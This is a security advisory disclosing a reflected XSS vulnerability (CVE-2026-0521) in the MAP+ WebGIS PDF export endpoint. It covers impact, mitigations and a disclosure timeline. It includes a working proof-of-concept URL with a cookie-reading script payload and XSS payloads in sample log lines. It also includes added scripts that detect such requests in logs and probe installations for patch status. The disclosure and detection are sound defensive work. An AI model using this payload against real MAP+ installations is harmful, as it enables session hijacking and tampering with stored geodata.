Security Advisory for MAP+: Reflected Cross-Site Scripting (XSS) in PDF Export Error Message

Feb 5, 2026 by Benjamin Faller, David Wischnjak

During a recent engagement, Redguard's security team conducted a penetration test against the GIS infrastructure of a customer. In the course of this test, a reflected cross-site scripting (XSS) vulnerability was discovered in the PDF export functionality of the MAP+ application, a WebGIS solution developed by the vendor TYDAC AG that provides a map to view, edit, and export geodata. This flaw, now assigned CVE-2026-0521, enables an unauthenticated attacker to craft a malicious URL that, if visited by a victim, executes JavaScript in the victim's browser context. The vulnerability was rated medium severity with a CVSS 4.0 score of 5.6. Concluding the coordinated disclosure process, the vendor has released a patch to address this issue.

Security Advisory for CVE-2026-0521

A reflected cross-site scripting (XSS) vulnerability in the PDF export functionality of the MAP+ WebGIS solution allows unauthenticated attackers to craft a malicious URL that, if visited by a victim, executes arbitrary JavaScript in the victim's context. Such a URL can be delivered in various ways, for instance by sending the link directly or by luring the victim to an attacker-controlled page that redirects to or embeds it.

  • Vulnerability Type: Reflected cross-site scripting (XSS) via a specially-crafted URL
  • Attack Vector: Unauthenticated user crafts a malicious URL that is subsequently opened by a victim
  • Affected Product: MAP+
  • CVSS Score: 5.6 (MEDIUM - CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:L/VI:H/VA:H/SC:N/SI:N/SA:N/E:P)
  • CVE: CVE-2026-0521

Proof of Concept (PoC)

MAP+ allows users to export a chosen map boundary as a PDF. If the application encounters an error during the export, the value of the site parameter is reflected without encoding in the error message returned to the user, allowing attacker-controlled markup and script to be injected. The following request was sent by the user's browser after a PDF export was initiated:

POST /mapplus-lib/mapplus-dojo/v3.4.0/php/processPDFdocument.php?ugroup=public&uprofile=public&dpi=300&colmode=0&imgw=0&imgh=0&pts=&ext=[REDACTED]&bl=[REDACTED]&vl=&op=&layout=[REDACTED]&folder=[REDACTED]&site=ext&scale=2500&maintitle=&angle=0&grid=b&legend=1&lang=de&pr=&sessID=[...]&logging=mapplus_state HTTP/1.1
Host: [REDACTED]
Cookie: [...]
Content-Type: application/x-www-form-urlencoded

accepted=ok&print_highlight=

The server then responded with a path to the generated PDF file:

HTTP/1.1 200 OK
Content-Length: 46
Content-Type: application/json;charset=UTF-8

{"url":"/mapimage/ext-[REDACTED]-[REDACTED].pdf"}

If the site parameter was changed to an XSS payload, the server reflected it unescaped in the response. Note that the endpoint also accepts all parameters via a GET request, with the two body parameters (accepted and print_highlight) moved into the query string; this is what makes the flaw exploitable through a plain link. For instance, a GET request to /mapplus-lib/mapplus-dojo/v3.4.0/php/processPDFdocument.php?ugroup=public&uprofile=public&dpi=300&colmode=0&imgw=0&imgh=0&pts=&ext=[REDACTED]&bl=[REDACTED]&vl=[REDACTED]&op=1|1|1&layout=[REDACTED]&folder=[REDACTED]&site=%3Cscript%3Ealert(document.cookie)%3b%3C%2fscript%3E&scale=25000&maintitle=&angle=0&grid=b&legend=1&lang=de&pr=&sessID=[...]&logging=mapplus_state&accepted=ok&print_highlight= resulted in the following response:

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Content-Length: 110

{error:"Syntax error in D:\www\[REDACTED]/<script>alert(document.cookie);</script>/public/config/print_lyr.conf"}

Two details make this exploitable in the browser. First, the error response is served as text/html (the successful export returns application/json), so the browser parses the reflected markup instead of treating it as data; the error message also reveals that the parameter is used to build the filesystem path of a configuration file. Second, the error is only reflected if the victim already has a valid session cookie stored in their browser. Such a cookie is assigned automatically on the first visit to the web page, so any prior visit to the application suffices.
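The request shape above is specific enough to hunt for in web server logs. The following detection script is an added example and not part of the advisory or of TYDAC's code: it parses combined-format access log lines, isolates requests to the processPDFdocument.php endpoint, percent-decodes the site parameter (twice, to catch double encoding) and flags values containing HTML or JavaScript metacharacters. The log lines are constructed; the redacted parameter values and client IPs are placeholders.

```python
"""Detect exploitation attempts against the MAP+ PDF export endpoint in
web server access logs (added example, not part of the advisory or vendor code).

The sample lines below are constructed: redacted parameter values from the
advisory are replaced with placeholders and the client IPs are made up.
"""
import re
from urllib.parse import urlsplit, parse_qs, unquote

ENDPOINT = "processPDFdocument.php"

# Metacharacters that no legitimate site name needs but that are required to
# break out of the reflected error text, plus common inline-handler patterns.
SUSPICIOUS = re.compile(r"""[<>"'`]|javascript:|on\w+\s*=""", re.IGNORECASE)

# Apache/Nginx "combined" format: client ident user [time] "METHOD URI PROTO" status bytes ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<uri>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

SAMPLE_LOG = """\
203.0.113.10 - - [19/Sep/2025:10:01:02 +0200] "POST /mapplus-lib/mapplus-dojo/v3.4.0/php/processPDFdocument.php?ugroup=public&uprofile=public&site=ext&scale=2500&lang=de HTTP/1.1" 200 46 "-" "Mozilla/5.0"
203.0.113.77 - - [19/Sep/2025:10:05:41 +0200] "GET /mapplus-lib/mapplus-dojo/v3.4.0/php/processPDFdocument.php?ugroup=public&uprofile=public&site=%3Cscript%3Ealert(document.cookie)%3b%3C%2fscript%3E&scale=25000&lang=de&accepted=ok&print_highlight= HTTP/1.1" 200 110 "-" "Mozilla/5.0"
203.0.113.78 - - [19/Sep/2025:10:06:10 +0200] "GET /mapplus-lib/mapplus-dojo/v3.4.0/php/processPDFdocument.php?site=%253Cimg%2520src%253Dx%2520onerror%253Dalert(1)%253E&lang=de HTTP/1.1" 200 120 "-" "curl/8.0"
203.0.113.79 - - [19/Sep/2025:10:07:00 +0200] "GET /other/search.php?q=%3Cscript%3E HTTP/1.1" 200 512 "-" "Mozilla/5.0"
"""


def decode_param(value, rounds=2):
    """Percent-decode repeatedly (bounded) so double-encoded payloads are caught."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def find_xss_attempts(log_text):
    """Return (ip, method, decoded_site) for requests to the PDF export endpoint
    whose `site` parameter contains HTML/JS metacharacters."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue                      # not a combined-format line, skip
        parts = urlsplit(m.group("uri"))
        if not parts.path.endswith("/" + ENDPOINT):
            continue                      # scope to the vulnerable endpoint
        # parse_qs decodes one level; keep_blank_values keeps empty params
        for raw_site in parse_qs(parts.query, keep_blank_values=True).get("site", []):
            site = decode_param(raw_site)
            if SUSPICIOUS.search(site):
                hits.append((m.group("ip"), m.group("method"), site))
    return hits


if __name__ == "__main__":
    for ip, method, site in find_xss_attempts(SAMPLE_LOG):
        print(f"{ip} {method} site={site!r}")
```

The rule is deliberately scoped to the site parameter of this endpoint, which keeps false positives low; widening SUSPICIOUS to all parameters of the endpoint is a one-line change if broader coverage is wanted.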

Impact

When attackers successfully exploit this vulnerability, they can execute malicious JavaScript in the victim's browser within the application's origin. This allows them to read the web application's session cookie and hijack the session; even where the cookie is not readable from script, the injected code can still issue authenticated requests on the victim's behalf. Depending on the configuration, this would enable attackers to edit the stored geodata, provided the victim's account holds the necessary privileges.

Affected versions

This vulnerability was identified in MAP+ version 3.4.0 (the version also visible in the request path). According to the customer, this was the latest patch level at the time of the penetration test.

Suggested Mitigations and Countermeasures

The vendor has addressed this vulnerability by providing backports for all versions greater than 3.0. According to the vendor, patched installations keep their original version number, so version numbers cannot be used to determine whether the patch has been applied. Operators should instead verify behaviourally: replay the export request with a harmless marker in the site parameter and confirm that it is no longer reflected unencoded in an HTML response. As an additional defense-in-depth measure besides patching, Redguard recommends configuring a strong Content-Security-Policy (CSP) to mitigate this class of attack. Furthermore, care should be taken that other web applications running on the same domain do not extend trust to this application, for example through permissive Cross-Origin Resource Sharing (CORS) policies or cookies scoped to the shared parent domain.
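Since version numbers do not reveal patch status, the check below performs the behavioural verification described above. It is an added example, not part of the advisory or of TYDAC's code. It recreates the advisory's GET request with a non-executing marker in site, obtains the session cookie by first loading the application start page (the advisory states the cookie is set on the first visit), and classifies the response by whether the marker comes back verbatim, escaped, or not at all, and under which Content-Type. Assumptions: the values for ext, bl, layout and folder are redacted in the advisory and must be supplied by the tester; the sessID parameter, elided in the advisory, is omitted; the two sample response bodies are constructed from the advisory's observed output.

```python
"""Behavioural patch check for the MAP+ `site` reflection
(added example, not part of the advisory or vendor code).

Assumptions: `ext`, `bl`, `layout` and `folder` are redacted in the advisory
and are passed in by the tester; `sessID` is omitted; the session cookie is
obtained by loading the application start page first.
"""
import html
import http.cookiejar
import urllib.parse
import urllib.request

ENDPOINT = "/mapplus-lib/mapplus-dojo/v3.4.0/php/processPDFdocument.php"
# Harmless marker: carries the metacharacters that matter, executes nothing.
MARKER = "<redguardcheck>"


def build_probe_url(base_url, ext, bl, layout, folder, marker=MARKER):
    """Recreate the advisory's GET request with `site` set to the marker."""
    params = {
        "ugroup": "public", "uprofile": "public", "dpi": "300", "colmode": "0",
        "imgw": "0", "imgh": "0", "pts": "", "ext": ext, "bl": bl, "vl": "",
        "op": "", "layout": layout, "folder": folder, "site": marker,
        "scale": "2500", "maintitle": "", "angle": "0", "grid": "b",
        "legend": "1", "lang": "de", "pr": "", "logging": "mapplus_state",
        "accepted": "ok", "print_highlight": "",
    }
    return base_url.rstrip("/") + ENDPOINT + "?" + urllib.parse.urlencode(params)


def classify(content_type, body, marker=MARKER):
    """Classify an error response.

    'vulnerable' - marker appears verbatim and the response is text/html,
                   so a browser would parse attacker-supplied tags.
    'reflected'  - marker appears verbatim but not as text/html (still a
                   bug, but browsers do not render application/json).
    'escaped'    - marker appears only HTML-escaped or JSON-\\u-escaped.
    'not_found'  - marker is absent from the response.
    """
    ct = content_type.split(";")[0].strip().lower()
    if marker in body:
        return "vulnerable" if ct == "text/html" else "reflected"
    if html.escape(marker) in body or marker.replace("<", "\\u003c") in body:
        return "escaped"
    return "not_found"


def probe(base_url, ext, bl, layout, folder):
    """Live check: fetch the start page for the session cookie, then probe."""
    jar = http.cookiejar.CookieJar()
    opener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(jar))
    opener.open(base_url, timeout=15).read()          # sets the session cookie
    url = build_probe_url(base_url, ext, bl, layout, folder)
    with opener.open(url, timeout=30) as resp:
        body = resp.read().decode("utf-8", "replace")
        return classify(resp.headers.get("Content-Type", ""), body), url


# Constructed responses modelled on the advisory's observed error output
# (unpatched) and on what a correctly encoding JSON error would look like.
VULN_BODY = '{error:"Syntax error in D:\\www\\site/<redguardcheck>/public/config/print_lyr.conf"}'
FIXED_BODY = '{"error":"Syntax error in D:\\\\www\\\\site/&lt;redguardcheck&gt;/public/config/print_lyr.conf"}'

if __name__ == "__main__":
    import sys
    if len(sys.argv) == 6:                # base_url ext bl layout folder
        print(probe(*sys.argv[1:]))
    else:
        print("offline demo:", classify("text/html; charset=UTF-8", VULN_BODY),
              classify("application/json;charset=UTF-8", FIXED_BODY))
```

Run it without arguments for the offline demonstration, or with the base URL and the four site-specific parameter values against an installation you are authorised to test. A result of "reflected" means the encoding is still missing even though the content type no longer lets the browser execute it, and should be reported to the vendor as well.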

Credits

  • Benjamin Faller, Redguard AG
  • David Wischnjak, Redguard AG

Timeline

In the following timeline, the customer refers to the company that tasked Redguard with a penetration test of their application and the vendor refers to the TYDAC AG team.

  • 2025-09-19: Redguard reported the vulnerability to the customer
  • 2025-09-26: Customer agreed to initiate the CVD process
  • 2025-11-14: Redguard notified the vendor regarding the vulnerability and the intent to pursue CVD
  • 2025-12-03: Redguard contacted the vendor via phone due to no response. The vendor requested that information be resent to a specific email address as it was not received.
  • 2025-12-04: Redguard shared the technical details with the vendor. The vendor acknowledged prior receipt of these findings via the customer and stated that a patch had already been provided. Redguard inquired if patch verification was required prior to publication; no response was received.
  • 2025-12-16: Redguard contacted the NCSC to reserve a CVE ID
  • 2025-12-17: NCSC reserved CVE-2026-0521
  • 2026-01-15: Redguard asked the vendor whether any open points prior to the publication exist
  • 2026-01-16: Vendor called Redguard to clarify open questions. Both parties agreed to discuss this in a meeting the following week.
  • 2026-01-19: Meeting was planned. The vendor asked to receive a publication draft before the meeting which was provided again, including examples of prior published advisories.
  • 2026-01-20: Short alignment call between Redguard and the vendor. The vendor clarified that a retest would not be necessary and agreed to provide the affected and fixed version numbers.
  • 2026-01-20: Vendor provided incomplete version numbers
  • 2026-01-26: Redguard asked for the exact affected version numbers
  • 2026-01-30: Redguard called the vendor regarding the version numbers. The vendor explained that no exact version numbers can be provided since all installations were patched using backports, which retained the same version number.
  • 2026-01-30: Redguard updated the NCSC with the planned publication date
  • 2026-02-05: Publication of this advisory

Disclaimer

This advisory is not an exhaustive list of all potential security issues for the mentioned software. Other vulnerabilities may exist. The information provided is believed to be accurate at the time of publishing. Use of this information is at your own risk. Neither the author nor the publisher accepts any liability for any loss or damage arising from the use of, or reliance on, this information.
